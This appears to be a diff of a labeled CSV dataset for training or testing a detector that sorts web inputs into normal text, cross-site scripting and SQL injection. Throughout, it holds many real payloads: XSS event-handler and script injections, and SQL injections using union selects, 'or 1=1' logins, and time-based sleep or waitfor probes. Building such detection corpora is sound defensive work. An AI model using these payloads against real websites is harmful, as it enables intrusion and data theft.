-"<style>@keyframes x{}</style><b style=""animation-n",1,XSS,5013 -"1%"" ) procedure analyse ( extractvalue ( 9255,conc",2,SQLi,20025 -1' ) where 8291 = 8291,2,SQLi,17947 -"<body onmouseup=""alert(1)"">test</body>",1,XSS,5414 -<dl onpointerleave=alert(1)>XSS</dl>,1,XSS,8804 +"1"" ) ) ) or ( select * from ( select ( sleep ( 5 )",2,SQLi,14406 +Modify the website layout.,0,normal,22575 +<style>:target {color: red;}</style><samp id=x sty,1,XSS,5015 +"{""id"":null,""firstName"":""Akira"",""lastName"":""Obata"",",0,normal,26914 +1 ) as qwsa where 2874 = 2874,2,SQLi,17945 +"<applet onmousedown=""alert(1)"">test</applet>",1,XSS,5416 +<dir id=x tabindex=1 onactivate=alert(1)></dir>,1,XSS,8806 "ABC<div style=""x\x3Aexpression(javascript:alert(1)",1,XSS,462 -"-6659' ) where 1256 = 1256 union all select 1256,1",2,SQLi,16723 +"1"" ) ) as jrld where 3488 = 3488",2,SQLi,16721 "<a href=""javas\x06cript:javascript:alert(1)"" id=""f",1,XSS,441 -"1"" ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ",2,SQLi,15297 -What I am proposing is that the select minority of,0,normal,25162 -"1"" where 7232 = 7232 ( select ( case when ( 5451 =",2,SQLi,21430 -"-4371' ) ) ) union all select 7465,7465,7465,7465,",2,SQLi,18769 -1,0,normal,26711 -""" or """"^""",2,SQLi,11555 -"{""id"":null,""name"":""potatoes drive""}",0,normal,27576 -<section id=x tabindex=1 onfocusin=alert(1)></sect,1,XSS,1939 -1' and exp ( ~ ( select * from ( select concat ( 0,2,SQLi,15282 -"<div id=""129""><svg>",1,XSS,9118 -The platform will be available in other select mar,0,normal,25396 -<meta onpointermove=alert(1)>XSS</meta>,1,XSS,4871 -1' ) as ybuv where 9641 = 9641 union all select nu,2,SQLi,14966 -"Also like Sling, Vue has local broadcast networks ",0,normal,26388 -* ( | ( objectclass = * ) ),2,SQLi,12070 -"<map onkeypress=""alert(1)"" contenteditable>test</m",1,XSS,7976 -1%' ) ) ) and 9254 = ( select count ( * ) from rdb,2,SQLi,13215 -1 ) where 1333 = 1333 order by 1--,2,SQLi,19348 -She'll select the winner.,0,normal,24306 -AND 1=utl_inaddr.get_host_address((SELECT COUNT(DI,2,SQLi,11077 -1' ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5,2,SQLi,21174 -<meter onpointerleave=alert(1)>XSS</meter>,1,XSS,7705 -1' ) as ftyp where 5851 = 5851 or 4240 = ( select ,2,SQLi,21281 -1 ) or 8315 = ( select count ( * ) from sysibm.sys,2,SQLi,17319 -"-1123' ) ) ) union all select 6735,6735,6735,6735,",2,SQLi,20000 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5070 --4363%' ) ) ) or 5903 = ( 'qqpjq'|| ( select case ,2,SQLi,17330 -"<video onmousemove=""alert(1)"">test</video>",1,XSS,7223 -1'|| ( select 'tcfy' where 4546 = 4546 and 6969 = ,2,SQLi,19112 -Select a topic for your presentation.,0,normal,24147 +1' ) as irnj where 7274 = 7274 and 6969 = ( select,2,SQLi,15289 +1 and 9122 = 4153# nxcv,2,SQLi,20828 +Insert the note.,0,normal,22861 +"1%"" ) rlike ( select ( case when ( 7689 = 7689 ) t",2,SQLi,18767 +1,0,normal,26708 +select * from users where id = 1 union select 1<@$,2,SQLi,11557 +-2912' ) ) order by 1--,2,SQLi,13629 +"<style>@keyframes x{}</style><shadow style=""animat",1,XSS,1940 +Where's the spiritual healer?,0,normal,23649 +"<div id=""131""><b>drag and drop one of the followin",1,XSS,9120 +"{""id"":null,""name"":""mine""}",0,normal,26844 +<dt id=x tabindex=1 onactivate=alert(1)></dt>,1,XSS,4873 +"1 ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( 503",2,SQLi,13355 +"{""id"":null,""firstName"":""Jennifer"",""lastName"":""Lin""",0,normal,27582 +or 1 = 1#,2,SQLi,12072 +<tt id=x tabindex=1 onactivate=alert(1)></tt>,1,XSS,7978 +"1"" ) as qnmd where 5642 = 5642",2,SQLi,13208 +select ( case when ( 6969 = 5797 ) then 6969 else ,2,SQLi,19346 +"{""id"":null,""firstName"":""Wee"",""lastName"":""Ching"",""a",0,normal,27517 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11079 +1 ) as zhvx where 3171 = 3171 procedure analyse ( ,2,SQLi,17479 +<abbr onpointerenter=alert(1)>XSS</abbr>,1,XSS,7707 +1' where 2958 = 2958,2,SQLi,21279 +1' ) and ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,16479 +"1"" ) ) and 3754 = ( select upper ( xmltype ( chr (",2,SQLi,15359 +"<br oncontextmenu=""alert(1)"">test</br>",1,XSS,5072 +1'|| ( select 'zwcp' where 3333 = 3333,2,SQLi,17993 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7225 +Check conditions where needed.,0,normal,23361 +Select the right route for your travel.,0,normal,24144 "<iframe style=""position:absolute;top:0;left:0;widt",1,XSS,880 -1'+ ( select 'mikf' where 5814 = 5814 or 5356 = ( ,2,SQLi,16772 -1 ) where 9821 = 9821 or ( select * from ( select ,2,SQLi,17736 -select ( case when ( 5569 = 9390 ) then 5569 else ,2,SQLi,12558 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,22192 -"<td ondblclick=""alert(1)"">test</td>",1,XSS,5466 -<style>:target {color:red;}</style><optgroup id=x ,1,XSS,7512 -PBteen: Save 20% – 303% off select bedroom furnitu,0,normal,25788 --9202' where 9799 = 9799 or 4747 = dbms_utility.sq,2,SQLi,12898 -<figcaption onpointerenter=alert(1)>XSS</figcaptio,1,XSS,7665 -"select sleep ( 5 ) and ( ""tlbp"" = ""tlbp",2,SQLi,13839 +Let's choose a destination for our road trip.,0,normal,23685 +"iif ( 1095 = 2853,1,1/0 )",2,SQLi,17734 +"1 ) union all select null,null,null,null,null,null",2,SQLi,12560 +1' ) and 8407 = ( select count ( * ) from generate,2,SQLi,22190 +"<button draggable=""true"" ondragend=""alert(1)"">test",1,XSS,5468 +"<label oncopy=""alert(1)"" contenteditable>test</lab",1,XSS,7514 +Carefully select items.,0,normal,24439 +"1"" ) ) and 8514 = ( select count ( * ) from domain",2,SQLi,12900 +<code onpointerout=alert(1)>XSS</code>,1,XSS,7667 +1' in boolean mode ) and char ( 111 ) ||char ( 77 ,2,SQLi,14261 `'><script>\xE1\x9A\x80javascript:alert(1)</script,1,XSS,569 -Index columns where required.,0,normal,23255 -Select care.,0,normal,24739 -"1%"" ) and char ( 120 ) ||char ( 106 ) ||char ( 117",2,SQLi,19220 -"1"" ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and (",2,SQLi,18054 -"javascript:/*-->'//""//`//\""//</title></textarea></",1,XSS,9502 --3347'+ ( select xuzs where 1076 = 1076 union all ,2,SQLi,14580 -sleep(__TIME__)#,2,SQLi,10836 -I have done nothing but select and cut.,0,normal,26071 -<style>@keyframes slidein {}</style><bgsound style,1,XSS,7182 -"We got tossed into the establishment lane, we didn",0,normal,25176 -"<video onkeyup=""alert(1)"" contenteditable>test</vi",1,XSS,8047 -1 and ( 3020 = 3020 ) *6703# syuj,2,SQLi,12908 -and then use that information to select your seat.,0,normal,26364 -Where's your SQL skill set?,0,normal,23397 -"<image draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,2334 -"{""id"":null,""firstName"":""Petrina"",""lastName"":""Ngo"",",0,normal,27159 -"{""id"":null,""firstName"":""Ben"",""lastName"":""Chia"",""sp",0,normal,26854 -<body onresize=alert(1)>press F12!,1,XSS,9082 -But then it was time to select a foreign leader.,0,normal,26303 -"<nav onkeyup=""alert(1)"" contenteditable>test</nav>",1,XSS,2526 -"?pg=javascript:alert(1)"",",1,XSS,9877 -"1"" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 11",2,SQLi,20234 -1 and 7533 = 7533-- spzi,2,SQLi,17837 -He ordered a pepperoni pizza for lunch.,0,normal,22895 -<noframes onpointermove=alert(1)>XSS</noframes>,1,XSS,6490 -"-8819"" ) where 9119 = 9119 or 1570 = convert ( int",2,SQLi,20829 -"<image onmousedown=""alert(1)"">test</image>",1,XSS,4455 -1' ) ) ) ( select ( case when ( 4587 = 4587 ) then,2,SQLi,13634 -"{""id"":null,""firstName"":""Juay"",""lastName"":""Yew Hai""",0,normal,26794 -1'|| ( select 'pxkz' where 2207 = 2207 and ( 3020 ,2,SQLi,19987 -Spending out of a cape cod click on select.,0,normal,25527 -"1%"" ) ) union all select null#",2,SQLi,18088 -"<progress onbeforecut=""alert(1)"" contenteditable>t",1,XSS,6734 -"-4419%"" ) ) or 1 group by concat ( 0x7171706a71, (",2,SQLi,16452 -1' ) rlike ( select ( case when ( 7689 = 7689 ) th,2,SQLi,18552 -"<sup onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,3893 -<dfn onpointerdown=alert(1)>XSS</dfn>,1,XSS,2614 -"-5131' ) ) ) union all select 4854,4854,4854,4854,",2,SQLi,17032 -"<object data=%22data:text/html;base64,PHNjcmlwdD4g",1,XSS,9239 -<footer onpointerleave=alert(1)>XSS</footer>,1,XSS,6177 -select * from users where id = 1 union select .1$_,2,SQLi,11519 -"When choosing colored linens, you should select a ",0,normal,25158 -Select the best wedding officiant.,0,normal,24375 -group by userid having 1=1--,2,SQLi,9954 -"<object onmouseenter=""alert(1)"">test</object>",1,XSS,6936 -1' ) as oknw where 8777 = 8777,2,SQLi,12139 -XSS STYLE=xss:e/**/xpression(alert('XSS'))>,1,XSS,1576 -1' and ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,19428 -"<img onmouseenter=""alert(1)"">test</img>",1,XSS,7989 -"1"" ) as ivkw where 4218 = 4218 union all select nu",2,SQLi,17251 -"<;BGSOUND SRC="";javascript:alert(';XSS';);"";>;",1,XSS,1584 -He extended the competence of the ecclesiastical t,0,normal,26121 -"<meta HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCR",1,XSS,1521 -"{""id"":null,""firstName"":""Mona"",""lastName"":""Lim"",""ad",0,normal,27293 -"<;LINK REL="";stylesheet""; HREF="";http://ha.ckers.o",1,XSS,1618 -Select your adapt.,0,normal,25038 --5021'+ ( select yadq where 4285 = 4285 order by 1,2,SQLi,12122 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10765 -1,0,normal,26741 -"1"" and 5556 = ( select count ( * ) from all_users ",2,SQLi,17805 -javascript:alert()//--></title></style></noscript>,1,XSS,9523 -"-7531' ) union all select 3072,3072,3072,3072,3072",2,SQLi,12605 -1 ) where 5012 = 5012 ( select ( case when ( 4587 ,2,SQLi,13388 -"select * from users where id = 1 or @#""{ = 1 or 1 ",2,SQLi,12026 -<applet id=x tabindex=1 ondeactivate=alert(1)></ap,1,XSS,7622 -But for the sake of practical convenience it has l,0,normal,26313 -<isindex onpointerenter=alert(1)>XSS</isindex>,1,XSS,5059 -"{""id"":null,""firstName"":""Jaylen"",""lastName"":""Chuan""",0,normal,27345 -"1"" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ",2,SQLi,13731 -Select revise.,0,normal,24777 -"1"" ) union all select null,null,null#",2,SQLi,19001 -<article onpointerover=alert(1)>XSS</article>,1,XSS,2319 -<img src=x onload=prompt(1) onerror=alert(1) onmou,1,XSS,9830 +Modify data where needed.,0,normal,23252 +left,0,normal,23117 +1%' and 9660 = ( select count ( * ) from all_users,2,SQLi,19218 +"-9392 ) ) or elt ( 1032 = 1032,3623 ) and ( ( 2975",2,SQLi,16211 +"javascript:/*""/*'/*\""/*`/*--></title></noembed></t",1,XSS,9504 +1' rlike sleep ( 5 ) and 'gtfo' = 'gtfo,2,SQLi,14573 +""" or sleep(__TIME__)=""",2,SQLi,10838 +I should select a normal statement,0,normal,26068 +"<tr oncontextmenu=""alert(1)"">test</tr>",1,XSS,7184 +Select your offer.,0,normal,24946 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8049 +"1"" and elt ( 8464 = 5761,5761 ) and ""ydmt"" like ""y",2,SQLi,12910 +1%' ) ) and 9198 = 9198--,2,SQLi,14990 +Sort wires.,0,normal,23065 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2335 +"{""id"":null,""name"":""MetalGarurumon""}",0,normal,27157 +"{""id"":null,""firstName"":""Jo"",""lastName"":""Jun"",""addr",0,normal,26851 +"<body style=""background:gray"">",1,XSS,9084 +"By default, ilmid uses some heuristics to select a",0,normal,26300 +"<content onkeydown=""alert(1)"" contenteditable>test",1,XSS,2527 +?playerready=alert(document.cookie),1,XSS,9879 +"Open the browser and select ""Chrome"" on the upper ",0,normal,25813 +"1' and make_set ( 9860 = 6956,6956 ) and 'toru' = ",2,SQLi,22398 +1'+ ( select plhk where 6540 = 6540,2,SQLi,18484 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6492 +"1%' procedure analyse ( extractvalue ( 9255,concat",2,SQLi,21966 +<rb onfocusout=alert(1) tabindex=1 id=x></rb><inpu,1,XSS,4457 +1' where 2389 = 2389 and 2853 = cast ( ( chr ( 113,2,SQLi,13627 +"{""id"":null,""firstName"":""Evon"",""lastName"":""Choong"",",0,normal,26791 +"Select one of the bubbles, and then click ""Continu",0,normal,25616 +Check values where applicable.,0,normal,23283 +1' ) as ulbr where 7233 = 7233 and 7756 = dbms_uti,2,SQLi,16296 +"<map onclick=""alert(1)"">test</map>",1,XSS,6736 +1 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||,2,SQLi,20091 +1 ) ) as myyh where 5116 = 5116 or 7427 = dbms_pip,2,SQLi,18550 +"<title onmouseenter=""alert(1)"">test</title>",1,XSS,3895 +"<param oncopy=""alert(1)"" contenteditable>test</par",1,XSS,2615 +"-2718"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +",2,SQLi,21295 +<object data=javascript:alert(1)>,1,XSS,9241 +"<iframe onpaste=""alert(1)"" contenteditable>test</i",1,XSS,6179 +hi' ) or ( 'a' = 'a,2,SQLi,11521 +"When it comes time to pay, select the payment plan",0,normal,25155 +Select the perfect honeymoon resort.,0,normal,24372 +like '%',2,SQLi,9956 +"<article onmouseout=""alert(1)"">test</article>",1,XSS,6938 +1 ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ,2,SQLi,12141 +</XSS STYLE=xss:expression(alert('XSS'))>,1,XSS,1577 +-8292%' ) or 8571 = 8571--,2,SQLi,17741 +<element onfocusout=alert(1) tabindex=1 id=x></ele,1,XSS,7991 +1'|| ( select 'osty' from dual where 6433 = 6433 o,2,SQLi,17249 +"<;BODY BACKGROUND="";javascript:alert(';XSS';);"";>;",1,XSS,1585 +"1' and extractvalue ( 7982,concat ( 0x5c,0x7171706",2,SQLi,19977 +"<head><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""tex",1,XSS,1522 +"{""id"":null,""firstName"":""Tan"",""lastName"":""Elicia"",""",0,normal,27292 +<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;,1,XSS,1619 +"1, ( select ( case when ( 7734 = 7734 ) then ( sel",2,SQLi,20594 +"1"" ) or 6793 = ( select 6793 from pg_sleep ( 5 ) )",2,SQLi,12124 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10767 +1,0,normal,26738 +1 ) ) ) and char ( 107 ) ||char ( 121 ) ||char ( 9,2,SQLi,19182 +"javascript:/*""/*'/*`/*\""/**/ alert()//*</title></t",1,XSS,9525 +"waitfor delay '0:0:5' and ( ""ludp"" like ""ludp",2,SQLi,12607 +select ( case when ( 3140 = 4625 ) then 1 else 314,2,SQLi,18502 +admin' or 1 = 1--,2,SQLi,12028 +<big onfocusout=alert(1) tabindex=1 id=x></big><in,1,XSS,7624 +1' ) as dajk where 1452 = 1452 procedure analyse (,2,SQLi,18343 +"<bdi onpaste=""alert(1)"" contenteditable>test</bdi>",1,XSS,5061 +"{""id"":null,""firstName"":""Neo"",""lastName"":""House"",""a",0,normal,27344 +"1"" ) ) union all select null#",2,SQLi,21021 +Select age.,0,normal,24774 +1'|| ( select 'qdkb' where 4331 = 4331,2,SQLi,18999 +<style>:target {color:red;}</style><option id=x st,1,XSS,2320 +<svg/onload=alert(/INJECTX/)>,1,XSS,9832 "<object onError object onError=""javascript:javascr",1,XSS,406 "<script> Object.prototype.src = ['data:,alert(1)//",1,XSS,220 -"<content onmouseout=""alert(1)"">test</content>",1,XSS,4124 -Delete files.,0,normal,23010 -"1"" ) as rcnk where 1800 = 1800",2,SQLi,14265 -Select your flavor.,0,normal,24803 -"<style>@keyframes x{}</style><img style=""animation",1,XSS,8757 -<element onpointerleave=alert(1)>XSS</element>,1,XSS,2038 -"<element onmouseleave=""alert(1)"">test</element>",1,XSS,7948 -&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&,1,XSS,1023 -"<figure onkeypress=""alert(1)"" contenteditable>test",1,XSS,7435 -"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20",2,SQLi,10886 -"1"" where 9829 = 9829 order by 1#",2,SQLi,20297 +<map id=x tabindex=1 onfocusin=alert(1)></map>,1,XSS,4126 +Merge the project,0,normal,23007 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,14258 +Aggregate data where useful.,0,normal,23251 +"<style>@keyframes slidein {}</style><data style=""a",1,XSS,8759 +<form onpointerenter=alert(1)>XSS</form>,1,XSS,2039 +"<video onmouseleave=""alert(1)"">test</video>",1,XSS,7950 +&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#,1,XSS,1024 +<a id=x tabindex=1 onbeforedeactivate=alert(1)></a,1,XSS,7437 +"""),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:2",2,SQLi,10888 +"1%' ) ) ) and make_set ( 1543 = 5817,5817 ) and ( ",2,SQLi,14051 </script><script>alert('XSS');</script>,1,XSS,267 -1' ) ) as xrre where 1172 = 1172 and updatexml ( 3,2,SQLi,18663 -"1' and row ( 6237,7469 ) > ( select count ( * ) ,c",2,SQLi,16055 -"<A HREF=""http://66.102.7.147/""></A>",1,XSS,8862 -"<html onkeyup=""alert(1)"" contenteditable>test</htm",1,XSS,3828 -Where's the counseling office?,0,normal,23621 -""",(select%20if(count(*)!=-1,benchmark(3000000,MD5(",2,SQLi,11014 -"{""id"":null,""name"":""action""}",0,normal,27257 -"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCR",1,XSS,1352 -"1"" ) where 5197 = 5197 and elt ( 3114 = 3114,sleep",2,SQLi,18042 -Modi nd his Govt have no guts to ban any of these ,0,normal,26488 -""") waitfor delay '0:0:20' /*",2,SQLi,10935 -<link id=x tabindex=1 ondeactivate=alert(1)></link,1,XSS,8015 -"<command draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,4666 -><img src=x onerror=javascript:alert(('1'))>,1,XSS,1264 -"1"" ) ) ) and 8514 = ( select count ( * ) from doma",2,SQLi,18774 -<fieldset onpointerover=alert(1)>XSS</fieldset>,1,XSS,3585 -<legend id=x tabindex=1 onactivate=alert(1)></lege,1,XSS,5525 -"<br draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,7914 -"<spacer onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,7473 -<label onblur=alert(1) tabindex=1 id=x></label><in,1,XSS,4724 -1' ) and exp ( ~ ( select * from ( select concat (,2,SQLi,14460 -1 ) or 8315 = ( select count ( * ) from sysibm.sys,2,SQLi,21046 --3226'|| ( select 'ykdw' where 2617 = 2617 union a,2,SQLi,22068 -<caption onpointerover=alert(1)>XSS</caption>,1,XSS,4763 -"<footer onmouseout=""alert(1)"">test</footer>",1,XSS,4969 -1,0,normal,26734 -1'|| ( select 'bzxa' where 6320 = 6320,2,SQLi,17665 -or 1 in (select @@version)--,2,SQLi,10181 -1 ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 1,2,SQLi,13139 -"1"" union all select null,null,null,null#",2,SQLi,14803 -1 ) where 9160 = 9160,2,SQLi,17656 -"In a primary, voters select one candidate on a bal",0,normal,26016 -""")) or benchmark(10000000,MD5(1))#",2,SQLi,10846 -"<dialog oncontextmenu=""alert(1)"">test</dialog>",1,XSS,3518 +1 ) as rbmn where 5948 = 5948 and char ( 111 ) ||c,2,SQLi,17542 +1' and 5556 = ( select count ( * ) from all_users ,2,SQLi,20383 +"<title onmousedown=""alert(1)"">test</title>",1,XSS,8864 +<image3 onpointerdown=alert(1)>XSS</image3>,1,XSS,3830 +Where's the nail salon?,0,normal,23618 +"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(",2,SQLi,11016 +I want to select a new phone for my dad.,0,normal,23868 +"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCR",1,XSS,1353 +Select wither.,0,normal,24677 +"The MSB Select DAC II costs just shy of $90,000 (b",0,normal,25407 +""")) waitfor delay '0:0:20' /*",2,SQLi,10937 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8017 +<style>:target {color: red;}</style><tbody id=x st,1,XSS,4668 +"><img src=x onerror=javascript:alert((1""))>",1,XSS,1265 +"1, ( select ( case when ( 3902 = 3902 ) then ( sel",2,SQLi,18772 +<summary id=x tabindex=1 ondeactivate=alert(1)></s,1,XSS,3587 +<legend id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,5527 +"<i draggable=""true"" ondragenter=""alert(1)"">test</i",1,XSS,7916 +<figcaption id=x tabindex=1 ondeactivate=alert(1)>,1,XSS,7475 +"<header draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,4726 +1%' ) rlike sleep ( 5 ) and ( '%' = ',2,SQLi,19151 +"1"" ) ) as pafp where 6770 = 6770 and 8148 = like (",2,SQLi,21044 +right,0,normal,23118 +"<col oncut=""alert(1)"" contenteditable>test</col>",1,XSS,4765 +"<menu onmouseout=""alert(1)"">test</menu>",1,XSS,4971 +1,0,normal,26731 +select,0,normal,26581 +x' or 1=1 or 'x'='y,2,SQLi,10183 +"1%' ) ) ) union all select null,null--",2,SQLi,13141 +"1 ) where 8630 = 8630 union all select null,null--",2,SQLi,14796 +1 or 5286 = ( select count ( * ) from all_users t1,2,SQLi,14763 +-9005 union all select 4410#,2,SQLi,19611 +)%20waitfor%20delay%20'0:0:20'%20--,2,SQLi,10848 +<shadow onfocusout=alert(1) tabindex=1 id=x></shad,1,XSS,3520 "<body onBeforeUnload body onBeforeUnload=""javascri",1,XSS,396 -"<style>@keyframes x{}</style><track style=""animati",1,XSS,3834 -Select font.,0,normal,23076 -Where's the nearest gas station?,0,normal,23491 -<acronym onpointerdown=alert(1)>XSS</acronym>,1,XSS,4709 -But they are roaming a few select sections of Amer,0,normal,26302 -"<option onpaste=""alert(1)"" contenteditable>test</o",1,XSS,3308 -<footer onpointerover=alert(1)>XSS</footer>,1,XSS,6292 -"1' where 7445 = 7445 union all select null,null,nu",2,SQLi,21434 -<sup id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,5441 -"<script/src=""data:&comma;eval(atob(location.hash.s",1,XSS,9261 --1769 union all select 6054--,2,SQLi,20054 -1 ) where 9432 = 9432 and 6510 = ( select count ( ,2,SQLi,14960 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11079 -"1 ) ) ) and make_set ( 8882 = 1593,1593 ) and ( ( ",2,SQLi,20204 -if ( 1928 = 4811 ) select 1928 else drop function ,2,SQLi,14868 -"{""id"":null,""firstName"":""Wong"",""lastName"":""Qun Jie""",0,normal,27319 -"<element onkeydown=""alert(1)"" contenteditable>test",1,XSS,8951 --4256' ) where 9545 = 9545 or 5023 = ctxsys.driths,2,SQLi,20487 -"1 where 9869 = 9869 union all select null,null#",2,SQLi,20609 -"1"" where 8333 = 8333",2,SQLi,14695 -"For those using iPhones, open the App Store, selec",0,normal,26168 --3634%' ) ) or 2671 = 2434,2,SQLi,18373 -select * from users where id = 1.*1 union select 1,2,SQLi,11785 -"-1917"" ) or 8571 = 8571--",2,SQLi,15604 -select case when 2948 = 7279 then 1 else null end-,2,SQLi,16695 --4582 ) ) as gvfo where 8885 = 8885 or 4144 = ( se,2,SQLi,19373 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10485 -1' ) as dajk where 1452 = 1452 procedure analyse (,2,SQLi,18343 -<custom tags onpointerover=alert(1)>XSS</custom ta,1,XSS,5089 -"1"" ) ) ) and ( select 9067 from ( select count ( *",2,SQLi,21704 -"-4925"" union all select 5686,5686,5686,5686,5686,5",2,SQLi,12098 +<bdi onpointerdown=alert(1)>XSS</bdi>,1,XSS,3836 +Sort files.,0,normal,23073 +"1"" where 4294 = 4294 and make_set ( 2543 = 7988,79",2,SQLi,17844 +"<br onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,4711 +1'+ ( select 'hhnz' where 2465 = 2465,2,SQLi,19914 +<embed id=x tabindex=1 ondeactivate=alert(1)></emb,1,XSS,3310 +<body id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,6294 +1'+ ( select mumb where 4658 = 4658 or char ( 119 ,2,SQLi,21432 +"<ins onclick=""alert(1)"">test</ins>",1,XSS,5443 +<script/src=data&colon;text/j\u0061v\u0061&#115&#9,1,XSS,9263 +"1%"" and 4386 = utl_inaddr.get_host_address ( chr (",2,SQLi,19513 +"1"" ) where 7723 = 7723 and 6240 = ( 'qqpjq'|| ( se",2,SQLi,14953 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11081 +"-4285' ) ) ) union all select 8819,8819,8819,8819,",2,SQLi,16691 +1' ) as mwpp where 6192 = 6192,2,SQLi,14861 +"1' ) procedure analyse ( extractvalue ( 9255,conca",2,SQLi,14195 +"<source onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,8953 +"1"" ) ) union all select null,null,null#",2,SQLi,20485 +1' ) as yxdb where 4597 = 4597,2,SQLi,20607 +1'+ ( select 'czpg' where 6627 = 6627 and 2006 = 2,2,SQLi,14688 +France is leading the process to select a European,0,normal,26165 +1 ) as imdt where 6431 = 6431,2,SQLi,18371 +""" ) ) or pg_sleep ( __TIME__ ) --",2,SQLi,11787 +1 where 8214 = 8214 and 2853 = cast ( ( chr ( 113 ,2,SQLi,15695 +"select * from generate_series ( 7407,7407,case whe",2,SQLi,14409 +"-2899"" ) ) as uyoc where 8417 = 8417 union all sel",2,SQLi,19371 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10487 +"1%"" ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ",2,SQLi,18341 +"<s draggable=""true"" ondragleave=""alert(1)"">test</s",1,XSS,5091 +-5134 ) ) ) or 8571 = 8571--,2,SQLi,14401 +-9534%' or 3038 = 3038,2,SQLi,12100 <img src=`xx:xx`onerror=alert(1)>,1,XSS,896 -1 rlike sleep ( 5 ),2,SQLi,22466 -1 ) where 4600 = 4600 or sleep ( 5 ) --,2,SQLi,16443 -1' ) ) rlike sleep ( 5 ) and ( ( 'iwct' = 'iwct,2,SQLi,12197 -"<IMG SRC=x onloadedmetadata=""alert(String.fromChar",1,XSS,1226 --9672' ) ) as rupb where 8218 = 8218 or make_set (,2,SQLi,13556 -"<listing onkeypress=""alert(1)"" contenteditable>tes",1,XSS,6409 -"1 ) ) ) procedure analyse ( extractvalue ( 5840,co",2,SQLi,14712 -1'|| ( select 'gboi' where 4191 = 4191 and 8514 = ,2,SQLi,12185 -"1%"" ) ) and 9198 = 9198--",2,SQLi,17231 -<style>:target {color:red;}</style><listing id=x s,1,XSS,4755 -"select * from users where id = 1 or "" ) ["" or 1 = ",2,SQLi,11812 -Sort the mixed-up letters.,0,normal,22592 -"<select onpaste=""alert(1)"" contenteditable>test</s",1,XSS,6956 -"<xmp onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,6111 -"{""id"":null,""firstName"":""Gunaraj"",""lastName"":""Sundr",0,normal,27022 -"<h1 onmousemove=""alert(1)"">test</h1>",1,XSS,6762 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,15055 -declare,0,normal,23163 -1' ) where 7252 = 7252,2,SQLi,14240 -"1"" ) ) union all select null,null,null,null,null--",2,SQLi,21035 -"<div onmousemove=""alert(1)"">test</div>",1,XSS,4861 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10668 --5147 or ( 8459 = 8459 ) *4906,2,SQLi,18762 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,12166 -Select your state.,0,normal,24959 -"<del onmouseenter=""alert(1)"">test</del>",1,XSS,6267 -"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000",2,SQLi,10415 -Select a filter for the photo.,0,normal,24018 -"-2964"" ) ) order by 1--",2,SQLi,16154 -<head onpointermove=alert(1)>XSS</head>,1,XSS,3797 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4",2,SQLi,10420 -<b onpointerover=alert(1)>XSS</b>,1,XSS,3905 -select,0,normal,26560 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,19249 -<svg><x><script>alert('1'&#41</x>,1,XSS,9467 -"1"" ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||",2,SQLi,12657 -"{""id"":null,""name"":""Psyduck""}",0,normal,27568 -A select committee of the House of Commons (with M,0,normal,26423 -"-5478"" ) where 4100 = 4100 or 4747 = dbms_utility.",2,SQLi,14876 -"1"" ) where 3507 = 3507",2,SQLi,14805 -"When you've finished, select ""Done"" and press X, o",0,normal,25139 -1' ) as hvyx where 3194 = 3194 and char ( 107 ) ||,2,SQLi,16888 